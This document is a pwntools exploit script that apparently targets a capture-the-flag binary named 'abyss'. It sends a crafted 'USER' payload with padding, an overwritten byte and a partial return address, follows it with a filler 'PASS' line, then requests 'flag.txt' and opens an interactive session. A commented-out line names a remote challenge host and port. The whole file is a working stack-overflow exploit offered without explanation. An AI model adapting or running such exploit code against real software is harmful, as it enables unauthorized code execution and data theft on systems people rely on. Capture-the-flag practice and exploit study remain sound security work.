from pwn import *
from pwnlib.util.cyclic import cyclic_gen
from pwnlib.util.fiddling import enhex, xor
from struct import pack
from pwnlib.util.cyclic import cyclic_gen

p = None

def run():
    global p
    chall = "./abyss"
    context.binary = chall
    context.log_level = 'debug'
    p = process(chall)
#    p = remote("83.136.253.153", "58350")
    elf = ELF(chall)
#    libc = ELF("libc-2.31.so")

    pause()
    g = cyclic_gen()
    p.send(p32(0))
#    payload = b'a'*(0x200-5)
    RET = b'\xeb\x14\x40' # 0x401485
    payload = b'a'*(0x5+0xc)
    payload += b'\x1c' + b'k'*(0xb) + RET
    p.send(b'USER ' + payload)

    pause()
    p.send(b'PASS ' + b'b'*(0x200-5))

    pause()
    p.send(b'flag.txt')
    p.interactive()

if __name__ == "__main__":
    run()